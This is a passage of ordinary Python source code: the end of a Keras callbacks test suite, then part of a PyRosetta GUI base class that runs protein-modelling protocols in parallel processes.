validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# In windows, due to \r\n line ends we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertEqual(loss[0], np.inf)
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains an summary of unexpected kind.
"""
result = _SummaryFile()
for (dirpath, dirnames, filenames) in os.walk(logdir):
del dirnames # unused
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in summary_iterator.summary_iterator(path):
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.images),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
},
)
def _strip_layer_names(self, summaries):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
new_tag = summary.tag.split('/', 1)[1]
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegexp(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
# Note that this test specifies model_type explicitly.
class TestTensorBoardV2WriteModelTest(test.TestCase):
def setUp(self):
super(TestTensorBoardV2WriteModelTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, write_graph=True)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensoriBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
if __name__ == '__main__':
test.main()
|
ProtocolBaseClass.py
|
#!/usr/bin/env python
#
# (c) Copyright Rosetta Commons Member Institutions.
# (c) This file is part of the Rosetta software suite and is made available under license.
# (c) The Rosetta software is developed by the contributing members of the Rosetta Commons.
# (c) For more information, see http://www.rosettacommons.org. Questions about this can be
# (c) addressed to University of Washington CoMotion, email: license@uw.edu.
## @file /GUIs/pyrosetta_toolkit/modules/protocols/ProtocolBaseClass.py
## @brief Simple base class for running protocols in the GUI. Includes multiprocessing.
## @author Jared Adolf-Bryfogle (jadolfbr@gmail.com)
#Rosetta Imports
from rosetta import *
import rosetta.basic.options
#Python Imports
import multiprocessing
from multiprocessing import Pool
from multiprocessing import Queue
from multiprocessing import Process
import time
import os.path
#Tkinter Imports
#Toolkit Imports
#from window_main.IO.GUIInput import GUIInput
from app.pyrosetta_toolkit.window_main.IO.GUIOutput import GUIOutput
from app.pyrosetta_toolkit.window_modules.scorefunction.ScoreFxnControl import ScoreFxnControl
class ProtocolBaseClass:
def __init__(self, pose, score_class, input_class, output_class):
self.pose = pose
self.score_class = score_class
self.input_class = input_class
self.output_class = output_class
#Ignore these. These are a trick to hint Komodo IDE about what types each of these variables are. And it fucking works!!!!!!!! Hallelujah!!!
#They never actually run!
if 0:
#self.input_class = GUIInput()
self.output_class = GUIOutput()
self.score_class = ScoreFxnControl()
def run_protocol(self, mover):
"""
Runs the protocol using the multiprocessing module. Assumes the protocol has a mover associated with it. Runs apply.
If your protocol has no mover, You can create one in python from the Rosetta Base class. Or, simply overwrite this method.
"""
#if create_master:
# master = multiprocessing.Process(name="master", target=self.run_protocol(mover, False))
# master.start()
# if not master.is_alive: self.output_class.terminal_output.set(0)
# return
self.pdb_name = self.output_class.outdir.get()+"/"+self.output_class.outname.get()
start_energy_score = self.score_class.score(self.pose)
self.output_class.terminal_output.set(1); #Redirect to stdout. For multiprocessing and major Rosetta output.
if self.output_class.processors.get()>1:
#Multiprocessing is done manually due to mover being unpicklable - Hence no Queue or Pool objects.
#First, we have an array of jobs:
workers = []
for i in range(1, self.output_class.decoys.get()+1):
outname = self.pdb_name+"_"+repr(i)+".pdb"
worker = Process(name = repr(i), target=self._run_mover, args=(mover, outname))
workers.append(worker)
total_allowed_jobs = self.output_class.processors.get()
print "Total allowed jobs: "+repr(total_allowed_jobs)
total_running_jobs = 0
job_complete=False
#Check if any PDB's already exist. Delete them or pop the workers depending on the overwrite option:
for worker in workers:
if os.path.exists(self.pdb_name+"_"+worker.name+".pdb"):
if self.output_class.overwrite.get():
os.remove(self.pdb_name+"_"+worker.name+".pdb")
print "Overwriting "+self.pdb_name+"_"+worker.name+".pdb"
else:
workers.pop(workers.index(worker))
print self.pdb_name+"_"+worker.name+".pdb already exists. Skipping. "
#Run the protocol
while not job_complete:
time.sleep(5)
for worker in workers:
if worker.is_alive():
pass
#print "Worker is alive"
#total_running_jobs+=1; #Increment total_running_jobs
elif os.path.exists(self.pdb_name+"_"+worker.name+".pdb"):
if worker.exitcode!=0:
print "%s.exitcode = %s" %(worker.name, worker.exitcode)
workers.pop(workers.index(worker)); #If the job is done, pop it.
total_running_jobs-=1
print "Total running jobs: "+repr(total_running_jobs)
print "Total workers waiting: "+repr(len(workers)-total_running_jobs)
if len(workers)==0:
job_complete=True
break
if total_running_jobs<total_allowed_jobs:
for worker in workers:
if ((not worker.is_alive())and (not os.path.exists(self.pdb_name+"_"+worker.name+".pdb"))):
print "Starting Worker"
try:
worker.start()
except AssertionError:
continue
total_running_jobs+=1
print "Total running jobs: "+repr(total_running_jobs)
print "Total workers waiting: "+repr(len(workers)-total_running_jobs)
if total_running_jobs>=total_allowed_jobs: break
if total_running_jobs==0:
job_complete=True
while len(multiprocessing.active_children()) != 0: time.sleep(1)
else:
mc = MonteCarlo(self.pose, self.score_class.score, self.output_class.kT)
for i in range(1, self.output_class.rounds.get()+1):
mover.apply(self.pose)
if self.output_class.use_boltzmann.get():
if mc.boltzmann(self.pose):
print "MC: Pose Accepted"
if self.output_class.rounds.get()>1:
print "Round"+repr(i)+": "+ repr(self.score_class.score(self.pose))+" REU"
if self.output_class.recover_low.get():
mc.recover_low(self.pose)
mc.show_scores()
mc.show_counters()
print "Start: "+ repr(start_energy_score)+" REU"
print "End: "+repr(self.score_class.score(self.pose))+" REU"
#Here we output the decoy if the user wishes, overwriting if nessessary.
if self.output_class.decoys.get()==1:
outpath = self.pdb_name+"_1.pdb"
if os.path.exists(outpath):
if self.output_class.overwrite.get():
os.remove(outpath)
self.output_pose(self.pose, outpath)
print "PDB exists. Overwriting."
else:
print "PDB exists. Skipping output."
else:
self.output_pose(self.pose, outpath)
print "Setting decoy as current pose."
self.output_class.terminal_output.set(0); #Reset output to textbox
if self.output_class.decoys.get()>1:
print "Original decoy still loaded."
print "Job Complete. Any decoys written to output directory."
return
def _run_mover(self, mover, outputname):
"""
Used for multiprocessing.
"""
#Reinitialize Rosetta to reinitialize options, and specifically, the SEED.
self.input_class.options_manager.re_init()
p = Pose(); #Copy it so that each process is working on a different pose object. Probably unnessessary.
p.assign(self.pose)
print outputname
start = self.score_class.score(p)
mc = MonteCarlo(p, self.score_class.score, self.output_class.kT)
for x in range(1, self.output_class.rounds.get()+1):
mover.apply(p)
if self.output_class.use_boltzmann.get():
if mc.boltzmann(p):
print "MC: Pose Accepted"
if self.output_class.recover_low.get():
mc.recover_low(p)
self.output_pose(p, outputname)
print "Start: " +repr(start)+" REU"
print "End: " +repr(self.score_class.score(p))+" REU"
def output_pose(self, p, outputname):
"""
Output pose function for ProtocolBaseClass.
"""
p.dump_pdb(outputname)
score_tag = ".fasc"
if not p.is_fullatom():
score_tag = ".sc"
